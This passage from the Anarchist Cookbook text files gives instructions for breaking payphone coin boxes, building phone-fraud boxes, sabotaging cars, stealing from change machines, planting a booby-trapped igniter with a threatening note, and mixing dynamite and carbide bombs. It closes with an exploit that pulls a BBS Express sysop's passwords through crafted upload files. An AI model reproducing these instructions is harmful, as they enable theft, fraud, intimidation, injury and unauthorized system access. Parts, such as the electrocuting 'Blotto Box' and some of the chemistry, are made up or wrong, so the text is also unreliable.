ONE PHREAK I KNOW DID MANAGE TO TAKE ONE OF THE 'MOTHERS' HOME (WHICH WAS
ATTACHED TO A PIECE OF PLYWOOD AT A CONSTRUCTION SITE; OTHERWISE, THE
PERMANENT ONES ARE A BITCH TO DETACH FROM THE WALL!).  IT TOOK HIM ALMOST
TEN HOURS TO OPEN THE COIN BOX USING A POWER DRILL, SLEDGE HAMMERS, AND CROW
BARS (WHICH WAS EMPTY -- PERHAPS NEXT TIME, HE WILL DEPOSIT A COIN FIRST TO
HEAR IF IT SLUSHES DOWN NICELY OR HITS THE EMPTY BOTTOM WITH A CLUNK.)
TAKING THE FONE OFFERS A HIGHER MARGIN OF SUCCESS.  ALTHOUGH THIS MAY BE
DIFFICULT OFTEN REQUIRING BRUTE FORCE AND THERE HAS BEEN SEVERAL CASES OF
BACK AXLES BEING LOST TRYING TO TAKE DOWN A FONE!  A QUICK AND DIRTY WAY TO
OPEN THE COIN BOX IS BY USING A SHOTGUN.  IN DETROIT, AFTER ECOLOGISTS
CLEANED OUT A MUNICIPAL POND, THEY FOUND 168 COIN PHONE RIFLED.
IN COLDER AREAS, SUCH AS CANADA, SOME SHREWD PEOPLE TAPE UP THE FONES USING
DUCT TAPE, POUR IN WATER, AND COME BACK THE NEXT DAY WHEN THE WATER WILL HAVE
FROZE THUS EXPANDING AND CRACKING THE FONE OPEN.
IN ONE CASE, "UNAUTHORIZED COIN COLLECTORS" WHERE CAUGHT WHEN THEY
BROUGHT $6,000 IN CHANGE TO A BANK AND THE BANK BECAME SUSPICIOUS...
AT ANY RATE, THE MAIN LOCK IS AN EIGHT LEVEL TUMBLER LOCATED ON THE RIGHT SIDE
OF THE COIN BOX.  THIS LOCK HAS 390,625 POSSIBLE POSITIONS (5 ^ 8, SINCE THERE
ARE 8 TUMBLERS EACH WITH 5 POSSIBLE POSITIONS) THUS IT IS HIGHLY PICK
RESISTANT!  THE LOCK IS HELD IN PLACE BY 4 SCREWS.  IF THERE IS SUFFICIENT
CLEARANCE TO THE RIGHT OF THE FONE, IT IS CONCEIVABLE TO PUNCH OUT THE SCREWS
USING THE DRILLING PATTERN BELOW (PROVIDED BY ALEXANDER MUNDY IN TAP #32):

====================================
                       !!        ^
                       !!        !
           ! 1- 3/16 " !!        !
           !<---   --->!!      1-1/2"
       --------------------      !
       !   !           !! !      !
       !  (+)         (+)-! -----------
    ---!               !! !      ^
    !  !               !! ! !
    !  !        (Z)    !! !      !
    !  !               !! !   2-3/16"
    ---!               !! !      !
       !  (+)         (+) !      !
       !               !! !      !
       -------------------- -----------
                       !!
                       !!
        (Z) KEYHOLE   (+) SCREWS
                       !!
===================================

AFTER THIS IS ACCOMPLISHED, THE LOCK CAN BE PUSHED BACKWARDS DISENGAGING
THE LOCK FROM THE COVER PLATE.  THE FOUR BOLTS OF THE COVER PLATE CAN THEN
BE RETRACTED BY TURNING THE BOLTWORKS WITH A SIMPLE KEY IN THE SHAPE OF THE
HOLE ON THE COIN PLATE (SEE DIAGRAM BELOW).  OF COURSE, THERE ARE OTHER
METHODS AND DRILLING PATTERNS.

:-------------------------------------:
                   _
                  ! !
                  ( )
                  !_!
               [ROUGHLY]
    DIAGRAM OF COVER PLATE KEYHOLE
:-------------------------------------:

THE TOP COVER USES A SIMILAR (BUT NOT AS STRONG) LOCKING METHOD WITH THE
KEYHOLE DEPICTED ABOVE ON THE TOP LEFT HIDE AND A REGULAR LOCK (PROBABLY
TUMBLER ALSO) ON THE TOP RIGHT-HAND SIDE. IT IS INTERESTING TO EXPERIMENT
WITH THE COIN SHUTE AND THE FORTRESSES OWN "RED BOX" (WHICH BELL DIDN'T HAVE
THE 'BALLS' TO COLOR RED).

MISCELLANEOUS:
--------------

IN A FEW AREAS (RURAL & CANADA), POST-PAY SERVICE EXISTS.  WITH THIS TYPE OF
SERVICE, THE MOUTHPIECE IS CUT OFF UNTIL THE CALLER DEPOSITS MONEY WHEN
THE CALLED PARTY ANSWERS.  THIS ALSO ALLOWS FOR FREE CALLS TO WEATHER AND
OTHER DIAL-IT SERVICES!  RECENTLY, 2600 MAGAZINE ANNOUNCED THE CLEAR BOX WHICH
CONSISTS OF A TELEPHONE PICKUP COIL AND A SMALL AMP.  IT IS BASED ON THE
RINCIPAL THAT THE RECEIVER IS ALSO A WEAK TRANSMITTER AND THAT BY AMPLIFYING
YOUR SIGNAL YOU CAN TALK VIA THE TRANSMITTER THUS AVOIDING COSTLY
TELEPHONE CHARGES! MOST FORTRESSES ARE FOUND IN THE 9XXX
AREA.  UNDER FORMER BELL AREAS, THEY USUALLY START AT 98XX (RIGHT BELOW THE
99XX OFFICIAL SERIES) AND MOVE DOWNWARD.
SINCE THE LINE, NOT THE FONE, DETERMINES WHETHER OR NOT A DEPOSIT
MUST BE MADE, DTF & CHARGE-A-CALL FONES MAKE GREAT EXTENSIONS!
FINALLY, FORTRESS FONES ALLOW FOR A NEW HOBBY--INSTRUCTION PLATE COLLECTING.
ALL THAT IS REQUIRED IS A FLAT-HEAD SCREWDRIVER AND A PAIR OF NEEDLE-NOSE
PLIERS.  SIMPLY USE THE SCREWDRIVER TO LIFT UNDERNEATH THE PLATE SO THAT YOU
CAN GRAB IT WITH THE PLIERS AND YANK DOWNWARDS. I WOULD SUGGEST COVERING THE
TIPS OF THE PLIERS WITH ELECTRICAL TAPE TO PREVENT SCRATCHING.  TEN CENT PLATES
ARE DEFINITELY BECOMING A "RARITY!"

FORTRESS SECURITY:
------------------

WHILE A LONELY FORTRESS MAY SEEM THE PERFECT TARGET, BEWARE!  THE GESTAPO
HAS BEEN KNOWN TO STAKE OUT FORTRESSES FOR AS LONG AS 6 YEARS ACCORDING TO THE
GRASS ROOTS QUARTERLY.  TO AVOID ANY PROBLEMS, DO NOT USE THE SAME FONES
REPEATEDLY FOR BOXING, CALLING CARDS, & OTHER EXPERIMENTS.  THE TELCO KNOWS HOW
MUCH MONEY SHOULD BE IN THE COIN BOX AND WHEN ITS NOT THERE THEY TEND TO GET
PERTURBED (READ:  PISSED OFF).

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                          --------Jolly Roger

p.s. This was originally written back in my old Apple ][ days, 
hence the upper case. I just did not think I should waste the 
little time I have to work on this shit converting it to lower-
case. Hell, I thought 80-columns was pretty nice of me.. heh heh. 
Well, enjoy this and the rest of this Cookbook! ---------JR

From the CookBook 4.. Exodus



Black Box Plans                                 by The Jolly Roger

Introduction:
------------
At any given time, the voltage running through your phone is about 20
Volts. When someone calls you, this voltage goes up to 48 Volts and rings
the bell. When you answer, the voltage goes down to about 10 Volts.
The phone company pays attention to this. When the voltage drops to 10,
they start billing the person who called you.

Function:
--------
The Black Box keeps the voltage going through your phone at 36 Volts,
so that it never reaches 10 Volts. The phone company is thus fooled
into thinking you never answered the phone and does not bill the caller.
However, after about a half hour the phone company will get suspicious
and disconnect your line for about 10 seconds.

Materials:
---------
1 1.8K 1/2 Watt Resistor
1 1.5V LED
1 SPST Switch

Procedure:
---------
(1) Open your phone by loosening the two screws on the bottom and
lifting the case off.
(2) There should be three wires: Red, Green, and Yellow. We'll be working
with the Red Wire.
(3) Connect the following in parallel:
     A. The Resistor and LED.
     B. The SPST Switch.
In other words, you should end up with this:
              (Red Wire)
           !---/\/\/\--O--!
(Line)-----!              !-----(Phone)
           !-----_/_------!
          /\/\/\ = Resistor
          O      = LED
          _/_    = SPST

Use:
---
The SPST Switch is the On/Off Switch of the Black Box. When the box is off,
your phone behaves normally. When the box is on and your phone rings,
the LED flashes. When you answer, the LED stays on and the voltage
is kept at 36V, so the calling party doesn't get charged. When the box
is on, you will not get a dial tone and thus cannot make calls.
Also remember that calls are limited to half an hour.

                                      ------------Exodus

p.s. Due to new Fone Company switching systems & the like, this 
may or may not work in your area. If you live in bumfuck Kentucky, 
then try this out. I make no guarantees! (I never do...) ----Ex.


The Infamous Blotto Box!!                       by The Jolly Roger
      
        (I bet that NOONE has the balls to build this one!)

Finally, it is here! What was first conceived as a joke to fool the innocent
phreakers around America has finally been conceived!
Well, for you people who are unenlightened about the Blotto Box,
here is a brief summery of a legend.

--*-=> The Blotto Box <=-*--

For years now every pirate has dreamed of the Blotto Box. It was at first
made as a joke to mock more ignorant people into thinking that
the function of it actually was possible. Well, if you are The Voltage
Master, it is possible. Originally conceived by King Blotto of much fame,
the Blotto Box is finally available to the public.
NOTE: Jolly Roger can not be responsible for the information disclosed
in the file! This file is strictly for informational purposes and
should not be actually built and used! Usage of this electronical impulse
machine could have the severe results listed below and could result in
high federal prosecution! Again, I TAKE NO RESPONSIBILITY!
All right, now that that is cleared up, here is the basis of the box
and it's function.
The Blotto Box is every phreaks dream... you could hold AT&T down on its
knee's with this device. Because, quite simply, it can turn off the phone
lines everywhere. Nothing. Blotto. No calls will be allowed out of an area
code, and no calls will be allowed in. No calls can be made inside it for
that matter. As long as the switching system stays the same, this box will
not stop at a mere area code. It will stop at nothing. The electrical
impulses that emit from this box will open every line. Every line will
ring and ring and ring... the voltage will never be cut off until the
box/generator is stopped. This is no 200 volt job, here.
We are talking GENERATOR. Every phone line will continue to ring, and people
close to the box may be electricuted if they pick up the phone.
But, the Blotto Box can be stopped by merely cutting of the line or generator.
If they are cut off then nothing will emit any longer. It will take
a while for the box to calm back down again, but that is merely a
superficial aftereffect. Once again: Construction and use of this box is
not advised! The Blotto Box will continue as long as there is
electricity to continue with.
OK, that is what it does, now, here are some interesting things for you
to do with it...

-*-=>Blotto Functions/Installin'<=-*-

Once you have installed your Blotto, there is no turning back. The
following are the instructions for construction and use of this box.
Please read and heed all warnings in the above section before you attempt
to construct this box.

Materials:
  - A Honda portable generator or a main power outlet like in a 
    stadium or some such place.
  - 400 volt rated coupler that splices a female plug into a
    phone line jack.
  - A meter of voltage to attach to the box itself.
  - A green base (i.e. one of the nice boxes about 3' by 4' that
    you see around in your neighborhood. They are the main switch
    boards and would be a more effective line to start with.
    or: A regular phone jack (not your own, and not in your area
    code!
  - A soldering iron and much solder.
  - A remote control or long wooden pole.
Now. You must have guessed the construction from that. If not, here goes,
I will explain in detail. Take the Honda Portable Generator and all of
the other listed equiptment and go out and hunt for a green base. Make
sure it is one on the ground or hanging at head level from a pole,
not the huge ones at the top of telephone poles. Open it up with anything
convienent, if you are two feeble that fuck don't try this.
Take a look inside... you are hunting for color-coordinating lines of
green and red. Now, take out your radio shack cord and rip the meter thing
off. Replace it with the voltage meter about. A good level to set the
voltage to is about 1000 volts. Now, attach the voltage meter to the cord
and set the limit for one thousand. Plug the other end of the cord
into the generator. Take the phone jack and splice the jack part off.
Open it up and match the red and green wires with
the other red and green wires. NOTE: If you just had the generator on
and have done this in the correct order, you will be a crispy critter.
Keep the generator off until you plan to start it up. Now, solder those
lines together carefully. Wrap duck tape or insultation tape around all
of the wires. Now, place the remote control right on to the startup
of the generator. If you have the long pole, make sure it is very long
and stand back as far away as you can get and reach the pole over.
NOTICE: If you are going right along with this without reading the file
first, you still realize now that your area code is about to become
null! Then, getting back, twitch the pole/remote control and run for your
damn life. Anywhere, just get away from it. It will be generating
so much electricity that if you stand to close you will kill yourself.
The generator will smoke, etc. but will not stop. You are now killing your
area code, because all of that energy is spreading through all of the
phone lines around you in every direction.

Have a nice day!

--*-=>The Blotto Box: Aftermath<=-*--
Well, that is the plans for the most devastating and ultimately deadly
box ever created. My hat goes off to: King Blotto (for the original idea).

                                          ---------Exodus




Blowgun                                         by The Jolly Roger

In this article I shall attempt to explain the use and manufacture
of a powerfull blow-gun and making darts for the gun.The possesion of
the blow gun described in this article IS a felony.
So be carefull where you use it. I don't want to get you all busted.

Needed:

1. Several strands of yarn (About 2 inches a-piece)
2. A regular pencil
3. A 2 1/4 inch long needle (hopefully with a beaded head. If not
   obtainable,wrap tape around end of needle.
4. 2-3 1/4 foot pipe. (PVC or Aluminum) Half a inch in diameter

Constructing the dart:

1st- Carefully twist and pull the metal part (Along with eraser)
of the pencil till it comes off.
2nd- Take Pin and start putting about 5-7 Strands of yarn on the pin. Then
push them up to the top of the pin. But not over the head of the pin (orthe tape).
3rd- Push pin through the hollow part of the head where the pencil was before.
4th- That should for a nice looking dart. (see illustration)

     #####
>>>>>-----/    #  is the yarn     
               >  is the head of the pencil
               -  is the pin it-self
               /  is the head of the pin

Using the Darts:
  
1st- Now take the finished dart and insert it in the tube
(if it is too small put on more yarn.)
2nd- Aim the tube at a door, wall, sister, ect.
3rd- blow on the end of the pipe.
4th- Sometimes the end of the pipe may be sharp. When this happens I
suggest you wrap it with some black electrician tape.It should feel
a lot better.
                                -= Exodus =-


Brown Box Plans                                 by The Jolly Roger

This is a fairly simple mod that can be made to any phone. All it does 
is allow you to take any two lines in your house and create a party
line. So far I have not heard of anyone who has any problems
with it. There is one thing that you will notice when you are
one of the two people who is called by a person with a brown box. The other
person will sound a little bit faint. I could overcome this with some 
amplifiers but then there wouldn't be very many of these made [Why not?].
I think the convenience of having two people on the line at once will 
make up for any minor volume loss.

Here is the diagram:
---------------------------------------
KEY:___________________________________
    |  PART               | SYMBOL    |
    |---------------------------------|
    | BLACK WIRE          |   *       |
    | YELLOW WIRE         |   =       |
    | RED WIRE            |   +       |
    | GREEN WIRE          |   -       |
    | SPDT SWITCH         |  _/_      |
    |                        _/_      |
    | VERTICAL WIRE       |   |       |
    | HORIZONTAL WIRE     |   _       |
    -----------------------------------
          *    =    -    +
          *    =    -    +
          *    =    -    +
          *    =    -    +
          *    =    -    +
          *    ==_/_-    +
          *******_/_++++++
          |              |
          |              |
          |              |
          |              |
          |              |
          |              |
          |_____PHONE____|

                                ------------Exodus


Calcium Carbide Bomb                            by The Jolly Roger

This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain some
calcium carbide. This is the stuff that is used in carbide lamps and
can be found at nearly any hardware store. Take a few pieces of this
stuff (it looks like gravel) and put it in a glass jar with some
water. Put a lid on tightly. The carbide will react with the water to
produce acetylene carbonate which is similar to the gas used in
cutting torches. Eventually the glass with explode from internal
pressure. If you leave a burning rag nearby, you will get a nice
fireball!
                            -----------Exodus


More Ways to Send a Car to Hell                 by The Jolly Roger

Due to a lot of compliments, I have written an update to file #14.
I have left the original intact. This expands upon the original 
idea, and could be well called a sequal. -----Ex.

How to have phun with someone else's car.  If you really detest
someone, and I mean detest, here's a few tips on what to do in your
spare time.  Move the windshield wiper blades, and insert and glue
tacks.  The tacks make lovely designs.  If your "friend" goes to
school with you, Just before he comes out of school.  Light a lighter
and then put it directly underneath his car door handle.
Wait...Leave...Listen.  When you hear a loud "shit!", you know he
made it to his car in time.  Remove his muffler and pour approximately
1 Cup of gas in it. Put the muffler back, then wait till their car starts.
Then you have a cigarette lighter.  A 30 foot long cigarette lighter.
This one is effective, and any fool can do it.  Remove the top
air filter. That's it!  Or a oldie but goodie: sugar in the gas tank.
Stuff rags soaked in gas up the exhaust pipe.  Then you wonder why
your "friend" has trouble with his/her lungs.  Here's one that takes
time and many friends.  Take his/her car then break into their house
and reassemble it, in their living or bedroom.  Phun eh?  If you're
into engines, say eeni mine moe and point to something and remove it.
They wonder why something doesn't work. There are so many others, but
the real good juicy ones come by thinking hard.

                                    -----------Exodus


Ripping off Change Machines                     by the Jolly Roger

Have you ever seen one of those really big changer machines in airports
laundrymats or arcades that dispense change when you put in your 1 or 5
dollar bill?  Well then, here is an article for you.

1)  Find the type of change machine that you slide in your bill length
wise, not the type where you put the bill in a tray and then slide the 
tray in!!!
2)  After finding the right machine, get a $1 or $5 bill.  Start crumpling
up into a ball.  Then smooth out the bill, now it should have a very wrinkly
surface.
3) Now the hard part.  You must tear a notch in the bill on the
left side about 1/2 inch below the little 1 dollar symbol (See Figure).
4) If you have done all of this right then take the bill and go out the
machine.  Put the bill in the machine and wait.  What should happen is:
when you put your bill in the machine it thinks everything is fine. 
When it gets to the part of the bill with the notch cut out, the
machine will reject the bill and (if you have done it right)
give you the change at the same time!!! So, you end up getting your bill
back, plus the change!!  It might take a little practice, but once
you get the hang of it, you can get a lot of money!
                  !--------------------------------!              
                  !                                !
                  ! (1)         /-------\      (1) !
                  !             !       !          !
                  !             !  Pic. !          ! 
                  ! (1)  /\     \-------/      (1) !
                  !      !!                        !       
                  !-----/  \-----------------------!
                          \-------Make notch here. About 1/2 " down from (1)

P.S. Sorry for the "text work" but you should be able to get the 
idea. Have fun!!!   -= Exodus =-



Clear Box Plans                                 by The Jolly Roger

The clear box is a new device which has just been invented that can be
used throughout Canada and rural United States. The clear box works on
"PostPay" payphones (fortress fones). Those are the payphones
that don't require payment until after the connection is established.
You pick up the fone, get a dial tone, dial your number, and then
insert your money after the person answers.
If you don't deposit the money then you can not speak to the person on
the other end because your mouth piece is cut off but not the ear-piece.
(obviously these phones are nice for free calls to weather or time or
other such recordings). All you must do is to go to your nearby Radio
Shack, or electronics store, and get a four-transistor amplifier and a
telephone suction cup induction pick-up. The induction pick-up would be
hooked up as it normally would to record a conversation, except
that it would be plugged into the output of the amplifier and a
microphone would be hooked to the input. So when the party
that is being called answers, the caller could speak through the little
microphone instead. His voice then goes through the amplifier and out
the induction coil, and into the back of the receiver where
it would then be broadcast through the phone lines and the other 
partywould be able to hear the caller. The Clear Box thus
'clears up' the problem of not being heard. Luckily, the line will
not be cut-off after a certain amount of time because it will wait
forever for the coins to be put in.
The biggest advantage for all of us about this new clear box is the
fact that this type of payphone will most likely become very common.
Due to a few things: 1st, it is a cheap way of getting the DTF,
dial-tone-first service, 2nd, it doesn't require any special equipment,
(for the phone company) This payphone will work on any phone line.
Usually a payphone line is different, but this is a regular phone line
and it is set up so the phone does all the charging, not the company.

                              ------------Exodus


CNA List                               Courtesy of The Jolly Roger

NPA  TEL NO          NPA  TEL NO
--------------------------------------
201  201-676-7070    601  601-961-8139
202  304-343-7016    602  303-293-8777
203  203-789-6815    603  617-787-5300
204  204-949-0900    604  604-432-2996
205  205-988-7000    605  402-580-2255
206  206-382-5124    606  502-583-2861
207  617-787-5300    607  518-471-8111
208  303-293-8777    608  608-252-6932
209  415-543-2861    609  201-676-7070
212  518-471-8111    612  402-580-2255
213  415-781-5271    613  416-443-0542
214  214-464-7400    614  614-464-0123
215  412-633-5600    615  615-373-5791
216  614-464-0123    616  313-223-8690
217  217-525-5800    617  617-787-5300
218  402-580-2255    618  217-525-5800
219  317-265-4834    619  818-501-7251
301  304-343-1401    701  402-580-2255
302  412-633-5600    702  415-543-2861
303  303-293-8777    703  304-344-7935
304  304-344-8041    704  912-784-0440
305  912-784-0440    705  416-979-3469
306  306-347-2878    706  *** NONE ***
307  303-293-8777    707  415-543-6374
308  402-580-2255    709  *** NONE ***
309  217-525-5800    712  402-580-2255
312  312-796-9600    713  713-861-7194
313  313-223-8690    714  818-501-7251
314  314-721-6626    715  608-252-6932
315  518-471-8111    716  518-471-8111
316  816-275-2782    717  412-633-5600
317  317-265-4834    718  518-471-8111
318  504-245-5330    801  303-293-8777
319  402-580-2255    802  617-787-5300
401  617-787-5300    803  912-784-0440
402  402-580-2255    804  304-344-7935
403  403-425-2652    805  415-543-2861
404  912-784-0440    806  512-828-2501
405  405-236-6121    807  416-443-0542
406  303-293-8777    808  212-334-4336
408  415-543-6374    809  212-334-4336
409  713-861-7194    812  317-265-4834
412  413-633-5600    813  813-228-7871
413  617-787-5300    814  412-633-5600
414  608-252-6932    815  217-525-5800
415  415-543-6374    816  816-275-2782
416  416-443-0542    817  214-464-7400
417  314-721-6626    818  415-781-5271
418  514-725-2491    819  514-725-2491
419  614-464-0123    901  615-373-5791
501  405-236-6121    902  902-421-4110
502  502-583-2861    904  912-784-0440
503  206-382-5124    906  313-223-8690
504  504-245-5330    907  *** NONE ***
505  303-293-8777    912  912-784-0440
506  506-648-3041    913  816-275-2782
507  402-580-2255    914  518-471-8111
509  206-382-5124    915  512-828-2501
512  512-828-2501    916  415-543-2861
513  614-464-0123    918  405-236-6121
514  514-725-2491    919  912-784-0440
515  402-580-2255    516  518-471-8111
517  313-223-8690    518  518-471-8111
519  416-443-0542    900  201-676-7070


From the CookBook 4.............. ExodusElectronic Terrorism                            by The Jolly Roger

It starts when a big, dumb lummox rudely insults you.  Being of a
rational, intelligent disposition, you wisely choose to avoid a
(direct) confrontation.  But as he laughs in your face, you smile
inwardly---your revenge is already planned.
Step 1:  follow your victim to his locker, car, or house.  Once you
have chosen your target site, lay low for a week or more,
letting your anger boil.
Step 2:  in the mean time, assemble your versatile terrorist
kit(details below.)
Step 3:  plant your kit at the designated target site on a monday
morning between the hours of 4:00 am and 6:00 am.  Include a
calm, suggestive note that quietly hints at the possibility
of another attack.  Do not write it by hand!  An example of
an effective note:
  "don't be such a jerk, or the next one will take off your
   hand.  Have a nice day."
Notice how the calm tone instills fear.  As if written by a
homicidal psychopath.
Step 5:  choose a strategic location overlooking the target site.  Try
to position yourself in such a way that you can see his facial contortions.
Step 6:  sit back and enjoy the fireworks! Assembly of the versatile,
economic, and effective terrorist kit #1: the parts you'll need are:
1) 4 aa batteries
2) 1 9-volt battery
3) 1 spdt mini relay (radio shack)
4) 1 rocket engine(smoke bomb or m-80)
5) 1 solar ignitor (any hobby store)
6) 1 9-volt battery connector


Step 1:  take the 9-volt battery and wire it through the relay's coil.
This circuit should also include a pair of contacts that when
separated cut off this circuit.  These contacts should be held together
by trapping them between the locker,mailbox, or car door.
Once the door is opened, the contacts fall apart and the 9-volt circuit
is broken, allowing the relay to fall to the closed postion
thus closing the ignition circuit. (If all this is confusing take a
look at the schematic below.)

Step 2:  take the 4 aa batteries and wire them in succession.
Wire the positive terminal of one to the negative terminal of another,
until all four are connected except one positive terminal and one negative
terminal.  Even though the four aa batteries only combine to create 6
volts, the increase in amperage is necessary to activate the solar
ignitor quickly and effectively.

Step 3:  take the battery pack (made in step 2) and wire one end of it
to the relay's single pole and the other end to one prong of the solar
ignitor.  Then wire the other prong of the solar ignitor back to the open
position on the relay.

Step 4:  using double sided carpet tape mount the kit in his locker,
mailbox, or car door. And last, insert the solar ignitor into the
rocket engine (smoke bomb or m-80).



Your kit is now complete!
       
        ---------><---------
        I    (CONTACTS)    I
        I                  I
        I                  -  (BATTERY)
        I                 ---
        I                  I
        I      (COIL)      I
        ------///////-------
          /-----------
         /           I
        /            I
       /             I
   (SWITCH) I        I
            I        I
            I       --- (BATTERY)
            I        -  ( PACK  )
            I       ---
            I        I
            I        I
            ---- -----
               I I
                *
         (SOLAR IGNITOR)

                               ---------Exodus---------


How to Start A Conference w/o 2600hz or M-F         by The Jolly Roger
     
        (Originally an Apple ][ file, forgive the upper case!)

THIS METHOD OF STARTING THE CONF. DEPENDS ON YOUR ABILITY TO BULLSHIT THE
OPERATOR INTO DIALING A NUMBER WHICH CAN ONLY BE REACHED WITH AN OPERATOR'S
M-F TONES.  WHEN BULLSHITTING THE OPERATOR REMEMBER OPERATOR'S ARE NOT
HIRED TO THINK BUT TO DO.

HERE IS A STEP-BY-STEP WAY TO THE CONF.:
1. CALL THE OPERATOR THROUGH A PBX OR EXTENDER, YOU COULD JUST CALL ONE
THROUGH YOUR LINE BUT I WOULDN'T RECOMMEND IT.
2. SAY TO THE OPERATOR:
TSPS MAINTENENCE ENGINEER, RING-FORWARD TO 213+080+1100, POSITION RELEASE,
THANKYOU.
(SHE WILL PROBABLY ASK YOU FOR THE NUMBER AGAIN)

DEFINITIONS: RING-FORWARD - INSTRUCTS HER TO DIAL THE NUMBER.
POSITION RELEASE - INSTUCTS HER TO RELEASE THE TRUNK AFTER SHE HAS
DIALED THE NUMBER.
+ - REMBER TO SAY 213PLUS080 PLUS1100.
3. WHEN YOU ARE CONNECTED WITH THE CONF. YOU WILL HERE A WHISTLE BLOW
TWICE AND A RECORDING ASKING YOU FOR YOUR OPERATOR #. DIAL IN ANY FIVE
DIGITS AND HIT THE POUNDS SIGN A COUPLE OF TIMES. SIMPLY DIAL IN THE #
OF THE BILLING LINE ECT. WHEN THE RECORDING ASK FOR IT.
3. WHEN IN THE CONTROL MODE OF THE CONF. HIT '6' TO TRANSFER CONTROL.
HIT '001' TO REENTER THE # OF CONFEREE'S AND TIME AMOUNT WHICH YOU
GAVE WHEN YOU STARED THE CONF. REMEMBER THE SIZE CAN BE FROM
2-59 CONFEREE'S. I HAVE NOT FOUND OUT THE 'LENGTHS' LIMITS.




How to Make Dynamite                            by The Jolly Roger

Dynamite is nothing more than just nitroglycerin and a stablizing
agent to make it much safer to use.  For the sake of saving time, I
will abbreviate nitroglycerin with a plain NG.  The numbers
are percentages, be sure to mix these carefully and be sure to use the
exact amounts.  These percentages are in weight ratio, not volume.

no.  ingredients                 amount
---------------------------------------
#1   NG                          32
     sodium nitrate              28
     woodmeal                    10
     ammonium oxalate            29
     guncotten                    1
#2   NG                          24
     potassium nitrate            9
     sodium nitate               56
     woodmeal                     9
     ammonium oxalate             2
#3   NG                          35.5
     potassium nitrate           44.5
     woodmeal                     6
     guncotton                    2.5
     vaseline                     5.5
     powdered charcoal            6
#4   NG                          25
     potassium nitrate           26
     woodmeal                    34
     barium nitrate               5
     starch                      10
#5   NG                          57
     potassium nitrate           19
     woodmeal                     9
     ammonium oxalate            12
     guncotton                    3
#6   NG                          18
     sodium nitrate              70
     woodmeal                     5.5
     potassium chloride           4.5
     chalk                        2
#7   NG                          26
     woodmeal                    40
     barium nitrate              32
     sodium carbonate             2
#8   NG                          44
     woodmeal                    12
     anhydrous sodium sulfate    44
#9   NG                          24
     potassium nitrate           32.5
     woodmeal                    33.5
     ammonium oxalate            10
#10  NG                          26
     potassium nitrate           33
     woodmeal                    41
#11  NG                          15
     sodium nitrate              62.9
     woodmeal                    21.2
     sodium carbonate              .9
#12  NG                          35
     sodium nitrate              27
     woodmeal                    10
     ammonium oxalate             1
#13  NG                          32
     potassium nitrate           27
     woodmeal                    10
     ammonium oxalate            30
     guncotton                    1
#14  NG                          33
     woodmeal                    10.3
     ammonium oxalate            29
     guncotton                     .7
     potassium perchloride       27
#15  NG                          40
     sodium nitrate              45
     woodmeal                    15
#16  NG                          47
     starch                      50
     guncotton                    3
#17  NG                          30
     sodium nitrate              22.3
     woodmeal                    40.5
     potassium chloride           7.2
#18  NG                          50
     sodium nitrate              32.6
     woodmeal                    17
     ammonium oxalate              .4
#19  NG                          23
     potassium nitrate           27.5
     woodmeal                    37
     ammonium oxalate             8
     barium nitrate               4
     calcium carbonate             .5

Household equivalants for chemicles

It has come to my attention that many of these chemicles are
sold under brand names, or have household equivalants.  here is a list
that might help you out. Also, see elsewhere in this Cookbook for 
a more complete listing............

acetic acid                vinegar
aluminum oxide             alumia
aluminum potassium sulfate alum
aluminum sulfate           alum
ammonium hydroxide         ammonia
carbon carbonate           chalk
calcium hypochloride       bleaching powder
calcium oxide              lime
calcium sulfate            plaster of paris
carbonic acid              seltzer
carbon tetrachloride       cleaning fluid
ethylene dichloride        Dutch fluid
ferric oxide               iron rust
glucose                    corn syrup
graphite                   pencil lead
hydrochloric acid          muriatic acid
hydrogen peroxide          peroxide
lead acetate               sugar of lead
lead tetrooxide            red lead
magnesium silicate         talc
magnesium sulfate          Epsom salts
naphthalene                mothballs
phenol                     carbolic acid
potassium bicarbonate      cream of tartar
potassium chromium sulf.   chrome alum
potassium nitrate          saltpeter
sodium dioxide             sand
sodium bicarbonate         baking soda
sodium borate              borax
sodium carbonate           washing soda
sodium chloride            salt
sodium hydroxide           lye
sodium silicate            water glass
sodium sulfate             glauber's salt
sodium thiosulfate         photographer's hypo
sulferic acid              battery acid
sucrose                    cane sugar
zinc chloride              tinner's fluid

Keep this list handy at all times. If you can't seem to get one
or more of the ingredients try another one.  If you still can't, you
can always buy small amounts from your school, or maybe from various
chemical companies.  When you do that, be sure to say as little as
possible, if during the school year, and they ask, say it's for a
experiment for school.
                              -------------Exodus-------------


Auto Exhaust Flame Thrower                      by The Jolly Roger

For this one, all you need is a car, a sparkplug, ignition wire and a
switch. Install the spark plug into the last four or five inches of
the tailpipeby drilling a hole that the plug can screw into easily.
Attach the wire (this is regular insulated wire) to one side of the
switch and to the spark plug. The other side of the switch is attached
to the positive terminal on the battery. With the car running, simply
hit the switch and watch the flames fly!!! Again be careful that no
one is behind you! I have seen some of these flames go 20 feet!!!

                               -------------Exodus------------


Breaking into BBS Express              Courtesy of the Jolly Roger

If you have high enough access on any BBS Express BBS you can get the
Sysop's password without any problems and be able to log on as him and do
whatever you like. Download the Pass file, delete the whole BBS, anything.
Its all a matter of uploading a text file and d/ling it from the BBS. You
must have high enough access to see new uploads to do this. If you can see
a file you just uploaded you have the ability to break into the BBS in a
few easy steps.
Why am I telling everyone this when I run BBS Express myself?
Well there is one way to stop this from happening and I want other Sysops
to be aware of it and not have it happen to them.
Breaking in is all based on the MENU function of BBS Express. Express
will let you create a menu to display different text files by putting the
word MENU at the top of any text file and stating what files are to be
displayed. But due to a major screw up by Mr. Ledbetter you can use this
MENU option to display the USERLOG and the Sysop's Passwords or anything
else you like. I will show you how to get the Sysop's pass and therefore
log on as the Sysop. BBs Express Sysop's have 2 passwords. One like
everyone else gets in the form of X1XXX, and a Secondary password
to make it harder to hack out the Sysops pass.
The Secondary pass is found in a file called SYSDATA.DAT.
This file must be on drive 1 and is therefore easy to get. All you have to
do is upload this simple Text file:

MENU
1
D1:SYSDATA.DAT

Ripoff time!

after you upload this file you d/l it non-Xmodem. Stupid Express thinks
it is displaying a menu and you will see this:

Ripoff time!

Selection [0]:

Just hit 1 and Express will display the SYSDATA.DAT file.OPPASS is where
the Sysop's Secondary pass will be. D1:USERLOG.DAT is where you will find
the name and Drive number of the USERLOG.DAT file. The Sysop might have
renamed this file or put it in a Subdirectory or even on a different
drive. I Will Assume he left it as D1:USERLOG.DAT. The other parts of this
file tell you where the .HLP screens are and where the LOG is saved and
all the Download path names.

Now to get the Sysop's primary pass you upload a text file like this:

MENU
1
